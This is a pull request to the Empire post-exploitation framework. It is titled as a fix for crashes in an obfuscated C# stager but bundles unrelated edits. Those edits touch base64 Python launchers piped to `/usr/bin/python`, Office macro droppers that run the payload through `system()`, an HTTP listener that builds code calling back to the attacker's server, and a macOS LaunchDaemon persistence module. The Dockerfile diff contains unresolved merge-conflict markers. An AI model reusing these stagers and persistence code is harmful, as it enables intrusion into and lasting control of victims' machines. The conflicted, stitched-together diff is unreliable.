### PR TITLE
csharp_exe ignore exceptions caused by obfuscation

### DIFF
--- a/Dockerfile
+++ b/Dockerfile
@@ -45,6 +45,8 @@ RUN apt-get update && apt-get install -qy \
     apt-utils \
     lsb-core \
     python2.7 \
+    python-dev \ 
+  && ln -s /usr/bin/python2.7 /usr/bin/python \
   && rm -rf /var/lib/apt/lists/*
 
 # build empire from source

--- a/Dockerfile
+++ b/Dockerfile
@@ -45,6 +45,11 @@ RUN apt-get update && apt-get install -qy \
     apt-utils \
     lsb-core \
     python2.7 \
+<<<<<<< HEAD
+=======
+    python-dev \ 
+  && ln -sf /usr/bin/python2.7 /usr/bin/python \
+>>>>>>> 4207760... Fix for ln: python : file exists
   && rm -rf /var/lib/apt/lists/*
 
 # build empire from source

--- a/data/misc/cSharpTemplateResources/cmd/cmd/Program.cs
+++ b/data/misc/cSharpTemplateResources/cmd/cmd/Program.cs
@@ -27,7 +27,7 @@ namespace cmd
 
             pipeline.Commands.AddScript(decodedScript);
 
-            pipeline.Commands.Add("Out-String");
+            pipeline.Commands.Add("Out-Default");
             pipeline.Invoke();
         }
 	}

--- a/empire
+++ b/empire
@@ -12,6 +12,10 @@ import ast
 # Empire imports
 from lib.common import empire, helpers
 
+# set global utf8 encoding
+reload(sys)
+sys.setdefaultencoding('utf8')
+
 global serverExitCommand
 serverExitCommand = 'restart'
 

--- a/lib/common/empire.py
+++ b/lib/common/empire.py
@@ -1280,18 +1280,18 @@ class AgentsMenu(SubMenu):
                 print ''
 
         else:
-            try:
-                choice = raw_input(helpers.color("[>] Kill agent '%s'? [y/N] " % (name), 'red'))
+            # extract the sessionID and clear the agent tasking
+            sessionID = self.mainMenu.agents.get_agent_id_db(name)
 
-                # extract the sessionID and clear the agent tasking
-                sessionID = self.mainMenu.agents.get_agent_id_db(name)
-
-                if sessionID and len(sessionID) != 0:
-                    self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_EXIT')
-                else:
-                    print helpers.color("[!] Invalid agent name")
-            except KeyboardInterrupt:
-                print ''
+            if sessionID and len(sessionID) != 0:
+                try:
+                    choice = raw_input(helpers.color("[>] Kill agent '%s'? [y/N] " % (name), 'red'))
+                    if choice.lower() != '' and choice.lower()[0] == 'y':
+                        self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_EXIT')
+                except KeyboardInterrupt:
+                    print ''
+            else:
+                print helpers.color("[!] Invalid agent name")
 
     def do_clear(self, line):
         "Clear one or more agent's taskings."

--- a/lib/listeners/http_hop.py
+++ b/lib/listeners/http_hop.py
@@ -269,8 +269,6 @@ class Listener:
                 routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='')
                 b64RoutingPacket = base64.b64encode(routingPacket)
 
-                # add the RC4 packet to a cookie
-                launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (b64RoutingPacket)
                 launcherBase += "import urllib2\n"
 
                 if proxy.lower() != "none":
@@ -294,6 +292,9 @@ class Listener:
                 else:
                     launcherBase += "o = urllib2.build_opener();\n"
 
+                # add the RC4 packet to a cookie
+                launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (b64RoutingPacket)
+                
                 #install proxy and creds globally, so they can be used with urlopen.
                 launcherBase += "urllib2.install_opener(o);\n"
 

--- a/lib/listeners/redirector.py
+++ b/lib/listeners/redirector.py
@@ -59,7 +59,7 @@ class Listener:
         self.threads = {} # used to keep track of any threaded instances of this server
 
         # optional/specific for this module
-        
+
 
         # set the default staging key to the controller db default
         #self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
@@ -95,7 +95,7 @@ class Listener:
         if not language:
             print helpers.color('[!] listeners/template generate_launcher(): no language specified!')
             return None
-        
+
         if listenerName and (listenerName in self.mainMenu.listeners.activeListeners):
 
             # extract the set options for this instantiated listener
@@ -332,7 +332,7 @@ class Listener:
 
                 if encode:
                     launchEncoded = base64.b64encode(launcherBase)
-                    launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | python &" % (launchEncoded)
+                    launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | /usr/bin/python &" % (launchEncoded)
                     return launcher
                 else:
                     return launcherBase
@@ -538,7 +538,7 @@ class Listener:
         """
         Generate just the agent communication code block needed for communications with this listener.
         This is so agents can easily be dynamically updated for the new listener.
-        
+
         This should be implemented for the module.
         """
 
@@ -706,13 +706,13 @@ def send_message(packets=None):
         here and the actual server code in another function to facilitate threading
         (i.e. start_server() in the http listener).
         """
-        
+
         tempOptions = copy.deepcopy(self.options)
         listenerName = self.options['Listener']['Value']
         # validate that the Listener does exist
         if self.mainMenu.listeners.is_listener_valid(listenerName):
             # check if a listener for the agent already exists
-            
+
             if self.mainMenu.listeners.is_listener_valid(tempOptions['Name']['Value']):
                 print helpers.color("[!] Pivot listener already exists on agent %s" % (tempOptions['Name']['Value']))
                 return False
@@ -754,7 +754,7 @@ def send_message(packets=None):
                 else{
                     $ConnectAddress = ""
                     $ConnectPort = ""
-                    
+
                     $parts = $ConnectHost -split(":")
                     if($parts.Length -eq 2){
                         # if the form is http[s]://HOST or HOST:PORT
@@ -778,7 +778,7 @@ def send_message(packets=None):
                         $ConnectPort = $parts[2]
                     }
                     if($ConnectPort -ne ""){
-                    
+
                         $out = netsh interface portproxy add v4tov4 listenport=$ListenPort connectaddress=$ConnectAddress connectport=$ConnectPort protocol=tcp
                         if($out){
                             $out
@@ -814,7 +814,7 @@ def send_message(packets=None):
                                 host = "http://%s:%s" % (tempOptions['internalIP']['Value'], tempOptions['ListenPort']['Value'])
                                 self.options[option]['Value'] = host
 
-                    
+
                     # check to see if there was a host value at all
                     if "Host" not in self.options.keys():
                         self.options['Host']['Value'] = host
@@ -886,7 +886,7 @@ def send_message(packets=None):
                         else{
                             $ConnectAddress = ""
                             $ConnectPort = ""
-                            
+
                             $parts = $ConnectHost -split(":")
                             if($parts.Length -eq 2){
                                 # if the form is http[s]://HOST or HOST:PORT
@@ -910,7 +910,7 @@ def send_message(packets=None):
                                 $ConnectPort = $parts[2]
                             }
                             if($ConnectPort -ne ""){
-                            
+
                                 $out = netsh interface portproxy add v4tov4 listenport=$ListenPort connectaddress=$ConnectAddress connectport=$ConnectPort protocol=tcp
                                 if($out){
                                     $out
@@ -933,12 +933,12 @@ def send_message(packets=None):
                     msg = "Tasked agent to uninstall Pivot listener "
                     self.mainMenu.agents.save_agent_log(sessionID, msg)
 
-                    
+
 
                 elif self.mainMenu.agents.get_language_db(sessionID).startswith("py"):
-                    
+
                     print helpers.color("[!] Shutdown not implemented for python")
-                    
+
             else:
                 print helpers.color("[!] Agent is not present in the cache or not elevated")
 

--- a/lib/modules/python/persistence/osx/CreateHijacker.py
+++ b/lib/modules/python/persistence/osx/CreateHijacker.py
@@ -108,7 +108,7 @@ class Module:
         safeChecks = self.options['SafeChecks']['Value']
         arch = self.options['Arch']['Value']
         launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', userAgent=userAgent, safeChecks=safeChecks)
-        launcher = launcher.strip('echo').strip(' | python &').strip("\"")
+        launcher = launcher.strip('echo').strip(' | /usr/bin/python &').strip("\"")
         dylibBytes = self.mainMenu.stagers.generate_dylib(launcherCode=launcher, arch=arch, hijacker='true')
         encodedDylib = base64.b64encode(dylibBytes)
         dylib = self.options['LegitimateDylibPath']['Value']

--- a/lib/modules/python/persistence/osx/launchdaemonexecutable.py
+++ b/lib/modules/python/persistence/osx/launchdaemonexecutable.py
@@ -97,7 +97,7 @@ class Module:
         userAgent = self.options['UserAgent']['Value']
         safeChecks = self.options['SafeChecks']['Value']
         launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', userAgent=userAgent, safeChecks=safeChecks)
-        launcher = launcher.strip('echo').strip(' | python &').strip("\"")
+        launcher = launcher.strip('echo').strip(' | /usr/bin/python &').strip("\"")
         machoBytes = self.mainMenu.stagers.generate_macho(launcherCode=launcher)
         encBytes = base64.b64encode(machoBytes)
 
@@ -159,12 +159,9 @@ process.communicate()
 process = subprocess.Popen('mv /tmp/%s /Library/LaunchDaemons/%s', stdout=subprocess.PIPE, shell=True)
 process.communicate()
 
-process = subprocess.Popen('launchctl load /Library/LaunchDaemons/%s', stdout=subprocess.PIPE, shell=True)
-process.communicate()
-
 print "\\n[+] Persistence has been installed: /Library/LaunchDaemons/%s"
 print "\\n[+] Empire daemon has been written to %s"
 
-""" % (encBytes,plistSettings, programname, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, programname)
+""" % (encBytes,plistSettings, programname, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, programname)
 
         return script

--- a/lib/stagers/multi/macro.py
+++ b/lib/stagers/multi/macro.py
@@ -164,8 +164,8 @@ Public Function Debugging() As Variant
                 Dim result As Long
                 Dim str As String
                 %s
-                'MsgBox("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & str & \" \\\"\"));"" | python &")
-                result = system("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & str & \" \\\"\"));"" | python &")
+                'MsgBox("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & str & \" \\\"\"));"" | /usr/bin/python &")
+                result = system("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & str & \" \\\"\"));"" | /usr/bin/python &")
             #Else
                 'Windows Rendering
                 Dim objWeb As Object

--- a/lib/stagers/osx/application.py
+++ b/lib/stagers/osx/application.py
@@ -95,6 +95,6 @@ class Stager:
 
         else:
             disarm = False
-            launcher = launcher.strip('echo').strip(' | python &').strip("\"")
+            launcher = launcher.strip('echo').strip(' | /usr/bin/python &').strip("\"")
             ApplicationZip = self.mainMenu.stagers.generate_appbundle(launcherCode=launcher,Arch=arch,icon=icnsPath,AppName=AppName, disarm=disarm)
             return ApplicationZip

--- a/lib/stagers/osx/dylib.py
+++ b/lib/stagers/osx/dylib.py
@@ -89,7 +89,7 @@ class Stager:
             return ""
 
         else:
-            launcher = launcher.strip('echo').strip(' | python &').strip("\"")
+            launcher = launcher.strip('echo').strip(' | /usr/bin/python &').strip("\"")
             dylib = self.mainMenu.stagers.generate_dylib(launcherCode=launcher, arch=arch, hijacker=hijacker)
             return dylib
 

--- a/lib/stagers/osx/macho.py
+++ b/lib/stagers/osx/macho.py
@@ -78,6 +78,6 @@ class Stager:
 
         else:
 
-            launcher = launcher.strip('echo').strip(' | python &').strip("\"")
+            launcher = launcher.strip('echo').strip(' | /usr/bin/python &').strip("\"")
             macho = self.mainMenu.stagers.generate_macho(launcher)
             return macho

--- a/lib/stagers/osx/macro.py
+++ b/lib/stagers/osx/macro.py
@@ -125,8 +125,8 @@ class Stager:
                             Dim result As Long
                             Dim cmd As String
                             %s
-                            'MsgBox("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & cmd & \" \\\"\"));"" | python &")
-                            result = system("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & cmd & \" \\\"\"));"" | python &")
+                            'MsgBox("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & cmd & \" \\\"\"));"" | /usr/bin/python &")
+                            result = system("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & cmd & \" \\\"\"));"" | /usr/bin/python &")
                     #End If
         End Function""" %(payload)
             elif version == "new":
@@ -149,8 +149,8 @@ class Stager:
                             Dim result As LongPtr
                             Dim cmd As String
                             %s
-                            'MsgBox("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & cmd & \" \\\"\"));"" | python &")
-                            result = system("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & cmd & \" \\\"\"));"" | python &", "r")
+                            'MsgBox("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & cmd & \" \\\"\"));"" | /usr/bin/python &")
+                            result = system("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & cmd & \" \\\"\"));"" | /usr/bin/python &", "r")
                     #End If
         End Function""" % (payload)
             else:

--- a/lib/stagers/osx/pkg.py
+++ b/lib/stagers/osx/pkg.py
@@ -89,7 +89,7 @@ class Stager:
             if AppName == '':
                 AppName = "Update"
             Disarm=True
-            launcherCode = launcher.strip('echo').strip(' | python &').strip("\"")
+            launcherCode = launcher.strip('echo').strip(' | /usr/bin/python &').strip("\"")
             ApplicationZip = self.mainMenu.stagers.generate_appbundle(launcherCode=launcherCode,Arch=arch,icon=icnsPath,AppName=AppName,disarm=Disarm)
             pkginstaller = self.mainMenu.stagers.generate_pkg(launcher=launcher,bundleZip=ApplicationZip,AppName=AppName)
             return pkginstaller

--- a/setup/install.sh
+++ b/setup/install.sh
@@ -84,14 +84,17 @@ function install_powershell() {
 		#Kali Linux
 		if cat /etc/lsb-release | grep -i 'Kali'; then
 			# Install prerequisites
-			apt-get install libunwind8 libicu55
-			wget http://security.debian.org/debian-security/pool/updates/main/o/openssl/libssl1.0.0_1.0.1t-1+deb8u7_amd64.deb
-			dpkg -i libssl1.0.0_1.0.1t-1+deb8u7_amd64.deb
+			apt-get update
+			apt-get install -y curl gnupg apt-transport-https
+			# Import the public repository GPG keys
+			curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add -
+			# Register the Microsoft Product feed
+			sh -c 'echo "deb [arch=amd64] https://packages.microsoft.com/repos/microsoft-debian-stretch-prod stretch main" > /etc/apt/sources.list.d/microsoft.list'
+			# Update the list of products
+			apt-get update
 			# Install PowerShell
-			wget https://github.com/PowerShell/PowerShell/releases/download/v6.0.0/powershell_6.0.0-1.ubuntu.16.04_amd64.deb
-			dpkg -i powershell_6.0.0-1.ubuntu.16.04_amd64.deb
-			
-       		fi
+			apt-get install -y powershell
+		fi
 	 fi
         if ls /opt/microsoft/powershell/*/DELETE_ME_TO_DISABLE_CONSOLEHOST_TELEMETRY; then
             rm /opt/microsoft/powershell/*/DELETE_ME_TO_DISABLE_CONSOLEHOST_TELEMETRY


### PR DESCRIPTION
SharpPick which can be generated using csharp_exe as project has a flaw, when you set Obfuscate to true there is no error handling and stager crashes. This can be fixed by changing line https://github.com/EmpireProject/Empire/blob/81487f672e8ac7ae7dbb178b4353ec3e25503c27/data/misc/cSharpTemplateResources/cmd/cmd/Program.cs#L30 to `Out-Default` which will ignore all the exceptions caused by obfuscating. There are other options to fix this, but this is certainly the simplest.